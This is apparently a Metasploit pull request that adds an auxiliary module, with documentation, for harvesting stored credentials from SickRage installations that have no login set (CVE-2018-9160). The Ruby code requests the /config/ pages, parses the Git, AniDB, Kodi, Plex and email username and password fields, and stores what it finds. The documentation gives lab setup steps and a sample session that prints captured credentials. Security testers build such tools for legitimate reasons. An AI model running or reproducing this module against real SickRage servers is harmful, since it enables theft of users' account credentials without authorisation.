### PR TITLE
Add SickRage Password Leak Auxiliary Module

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/http_sickrage_password_leak.md
+++ b/documentation/modules/auxiliary/scanner/http/http_sickrage_password_leak.md
@@ -1,0 +1,65 @@
+## Description
+  
+ This module exploits a vulnerability in SickRage for versions under v2018-03-09. A simple GET request will return clear-text credentials for Github, Kodi, Plex, AniDB, etc. This exploit will only work if the user has not set credentials for the SickRage application. By default, SickRage credentials are not set.
+
+## Vulnerable Application
+
+  SickRage < v2018-03-09
+
+### Installation and Setup
+
+  The vulnerable versions of SickRage are no longer accessible, but the latest release can be made vulnerable with a few changes.
+  The latest SickRage release for Windows can be found [here](https://github.com/SickRage/SickRageInstaller/releases).
+
+## Verification Steps
+
+  1.   Install the application
+  2.   Navigate to `C:\SickRage\SickRage\gui\slick\views`
+  3.   Open `config_general.mako`
+  4.   Find the input element with the name `git_password`
+  5.   Change the value from `${sickbeard.GIT_PASSWORD|hide}` to `${sickbeard.GIT_PASSWORD}`
+  6.   Save the changes
+  7.   Open `config_anime.mako`
+  8.   Find the input element with the name `anidb_password`
+  9.   Change the value from `${sickbeard.ANIDB_PASSWORD|hide}` to `${sickbeard.ANIDB_PASSWORD}`
+  10.  Save the changes
+  11.  Open `config_notifications.mako`
+  12.  Find the input element with the name `kodi_password`
+  13.  Change the value from `${sickbeard.KODI_PASSWORD|hide}` to `${sickbeard.KODI_PASSWORD}`
+  14.  Find the input element with the name `plex_server_password`
+  15.  Change the value from `${sickbeard.PLEX_SERVER_PASSWORD|hide}` to `${sickbeard.PLEX_SERVER_PASSWORD}`
+  16.  Find the input element with the name `plex_client_password`
+  17.  Change the value from `${sickbeard.PLEX_CLIENT_PASSWORD|hide}` to `${sickbeard.PLEX_CLIENT_PASSWORD}`
+  18.  Find the input element with the name `email_password`
+  19.  Change the value from `${sickbeard.EMAIL_PASSWORD|hide}` to `${sickbeard.EMAIL_PASSWORD}`
+  20.  Save the changes
+  21.  Start SickRage
+  22.  Start msfconsole
+  23.  Do: `use [auxiliary/scanner/http/http_sickrage_password_leak]`
+  24.  Do: `set RHOSTS [IP]`
+  25.  Do: `run`
+  26.  The credentials that the user has set should be printed to the screen
+
+## Scenarios
+
+### Tested on Windows 7 x86
+
+  ```
+  msf5 > use auxiliary/scanner/http/http_sickrage_password_leak
+  msf5 auxiliary(scanner/http/http_sickrage_password_leak) > set RHOSTS 192.168.37.130
+  RHOSTS => 192.168.37.130
+  msf5 auxiliary(scanner/http/http_sickrage_password_leak) > run
+
+  [+] git username: myUsername
+  [+] git password: myPassword
+  [+] anidb username: anidb
+  [+] anidb password: anidbpass
+  [+] plex_server username: plexu
+  [+] plex_server password: plexp
+  [+] plex_client username: plextu
+  [+] plex_client password: plextp
+  [+] Email username: sickrage@sickrage.com
+  [+] Email password: sickragepass
+  [*] Auxiliary module execution completed
+  msf5 auxiliary(scanner/http/http_sickrage_password_leak) >
+  ```

--- a/modules/auxiliary/scanner/http/http_sickrage_password_leak.rb
+++ b/modules/auxiliary/scanner/http/http_sickrage_password_leak.rb
@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
@@ -36,19 +36,19 @@ class MetasploitModule < Msf::Auxiliary
     ])
   end
 
-  def make_request(path)
+  def get_config(path)
     uri = normalize_uri(target_uri.path, path)
     res = send_request_cgi(
       'method' => 'GET',
       'uri'    => uri
     )
 
-    if res && res.code == 200
-      resHTML = res.get_html_document
-      get_creds(uri.split('/').last, resHTML)
-    else
+    unless res && res.code == 200
       print_error("Unable to reach #{uri}")
+      return
     end
+
+    res.get_html_document
   end
 
   def is_valid?(user, pass)
@@ -61,45 +61,42 @@ class MetasploitModule < Msf::Auxiliary
     store_valid_credential(user: user, private: pass)
   end
 
-  def get_creds(path, response)
-    pages = {
-      'general'       =>  'git',
-      'anime'         =>  'anidb',
-      'notifications' =>  ['kodi', 'plex_server', 'plex_client']
-    }
+  def get_creds(path, config)
+    return if config.at("input[@id=\"#{path}_username\"]").nil?
 
-    selectedPage = pages[path]
-    if selectedPage.nil?
-      print_error("Couldn't find results for #{path}")
-    elsif selectedPage.is_a?(Array)
-      selectedPage.each do |elem|
-        username = response.at("input[@id=\"#{elem}_username\"]").attribute('value').to_s
-        password = response.at("input[@id=\"#{elem}_password\"]").attribute('value').to_s
+    username = config.at("input[@id=\"#{path}_username\"]").attribute('value').to_s
+    password = config.at("input[@id=\"#{path}_password\"]").attribute('value').to_s
 
-        if is_valid?(username, password)
-          save_creds(elem, username, password)
-        end
-      end
+    if is_valid?(username, password)
+      save_creds(path, username, password)
+    end
+  end
 
-      hostname = response.at('input[@id="email_host"]').attribute('value').to_s
-      email_user = response.at('input[@id="email_user"]').attribute('value').to_s
-      email_pass = response.at('input[@id="email_password"]').attribute('value').to_s
+  def get_notification_creds(config)
+    return if config.at('input[@id="email_host"]').nil?
 
-      if is_valid?(email_user, email_pass)
-        save_creds("Email", email_user << "@#{hostname}", email_pass)
-      end
-    else
-      username = response.at("input[@id=\"#{selectedPage}_username\"]").attribute('value').to_s
-      password = response.at("input[@id=\"#{selectedPage}_password\"]").attribute('value').to_s
+    hostname = config.at('input[@id="email_host"]').attribute('value').to_s
+    email_user = config.at('input[@id="email_user"]').attribute('value').to_s
+    email_pass = config.at('input[@id="email_password"]').attribute('value').to_s
 
-      if is_valid?(username, password)
-        save_creds(selectedPage, username, password)
-      end
+    if is_valid?(email_user, email_pass)
+      save_creds("Email", "#{email_user}@#{hostname}", email_pass)
     end
   end
 
   def run
     paths = ['/config/general/', '/config/anime/', '/config/notifications/']
-    paths.each{ |selected| make_request(selected) }
+    paths.each do |path|
+      config = get_config(path)
+      next if config.nil?
+
+      if path.split('/').last.eql?('notifications')
+        get_notification_creds(config)
+      end
+
+      ['git', 'anidb', 'kodi', 'plex_server', 'plex_client'].each do |path|
+        get_creds(path, config)
+      end
+    end
   end
 end

--- a/modules/auxiliary/scanner/http/http_sickrage_password_leak.rb
+++ b/modules/auxiliary/scanner/http/http_sickrage_password_leak.rb
@@ -1,0 +1,109 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'HTTP SickRage Password Leak',
+      'Description'    => %q{
+        SickRage < v2018-09-03 allows an attacker to view a user's saved Github credentials in HTTP responses unless the user has set login information for SickRage.
+        By default, SickRage does not require login information for the installation.
+      },
+      'Author'         =>
+      [
+        'Sven Fassbender', # EDB POC
+        'Shelby Pace'     # Metasploit Module
+      ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['CVE', '2018-9160'],
+          ['EDB', '44545']
+        ]
+    ))
+
+    register_options(
+    [
+      OptString.new('TARGETURI', [true, 'Optional path that gets prepended to the default paths to be searched', '/']),
+      OptPort.new('RPORT', [true, 'Target Port', 8081])
+    ])
+  end
+
+  def make_request(path)
+    uri = normalize_uri(target_uri.path + path)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => uri
+    })
+
+    if res && res.code == 200
+      resHTML = res.get_html_document
+      get_creds(uri.split('/').last, resHTML)
+    else
+      print_error("Unable to reach #{uri}")
+    end
+  end
+
+  def is_valid?(user, pass)
+    if user == '' || pass == 'None'
+     false
+    else
+     true
+    end
+  end
+
+  def save_creds(app, user, pass)
+    print_good(app + " username: " + user)
+    print_good(app + " password: " + pass)
+    store_valid_credential(user: user, private: pass)
+  end
+
+  def get_creds(path, response)
+    pages = {
+      'general'       =>  'git',
+      'anime'         =>  'anidb',
+      'notifications' =>  ['kodi', 'plex_server', 'plex_client']
+    }
+
+    selectedPage = pages[path]
+    if selectedPage.nil?
+      print_error("Couldn't find results for #{path}")
+    elsif selectedPage.is_a?(Array)
+      selectedPage.each{ |elem|
+        username = response.at('input[@id="' + elem + '_username"]').attribute('value').to_s
+        password = response.at('input[@id="' + elem + '_password"]').attribute('value').to_s
+
+        if is_valid?(username, password)
+          save_creds(elem, username, password)
+        end
+      }
+
+      hostname = response.at('input[@id="email_host"]').attribute('value').to_s
+      email_user = response.at('input[@id="email_user"]').attribute('value').to_s
+      email_pass = response.at('input[@id="email_password"]').attribute('value').to_s
+
+      if is_valid?(email_user, email_pass)
+        email_user <<= "@" + hostname
+        save_creds("Email", email_user, email_pass)
+      end
+    else
+      username = response.at('input[@id="' + selectedPage + '_username"]').attribute('value').to_s
+      password = response.at('input[@id="' + selectedPage + '_password"]').attribute('value').to_s
+
+      if is_valid?(username, password)
+        save_creds(selectedPage, username, password)
+      end
+    end
+  end
+
+  def run
+    paths = ['/config/general/', '/config/anime/', '/config/notifications/']
+    paths.each{ |selected| make_request(selected) }
+  end
+end


### PR DESCRIPTION
Add HTTP SickRage Password Leak module

This module exploits a vulnerability in SickRage for versions under v2018-03-09. A simple GET request will return clear-text credentials for Github, Kodi, Plex, AniDB, etc. This exploit will only work if the user has not set credentials for the SickRage application. By default, SickRage credentials are not set.
 
## Verification

  1.   Install the application
  2.   Navigate to `C:\SickRage\SickRage\gui\slick\views`
  3.   Open `config_general.mako`
  4.   Find the input element with the name `git_password`
  5.   Change the value from `${sickbeard.GIT_PASSWORD|hide}` to `${sickbeard.GIT_PASSWORD}`
  6.   Save the changes
  7.   Open `config_anime.mako`
  8.   Find the input element with the name `anidb_password`
  9.   Change the value from `${sickbeard.ANIDB_PASSWORD|hide}` to `${sickbeard.ANIDB_PASSWORD}`
  10.  Save the changes
  11.  Open `config_notifications.mako`
  12.  Find the input element with the name `kodi_password`
  13.  Change the value from `${sickbeard.KODI_PASSWORD|hide}` to `${sickbeard.KODI_PASSWORD}`
  14.  Find the input element with the name `plex_server_password`
  15.  Change the value from `${sickbeard.PLEX_SERVER_PASSWORD|hide}` to `${sickbeard.PLEX_SERVER_PASSWORD}`
  16.  Find the input element with the name `plex_client_password`
  17.  Change the value from `${sickbeard.PLEX_CLIENT_PASSWORD|hide}` to `${sickbeard.PLEX_CLIENT_PASSWORD}`
  18.  Find the input element with the name `email_password`
  19.  Change the value from `${sickbeard.EMAIL_PASSWORD|hide}` to `${sickbeard.EMAIL_PASSWORD}`
  20.  Save the changes
  21.  Start SickRage
  22.  Start msfconsole
  23.  Do: `use [auxiliary/scanner/http/http_sickrage_password_leak]`
  24.  Do: `set RHOSTS [IP]`
  25.  Do: `run`
  26.  The credentials that the user has set should be printed to the screen


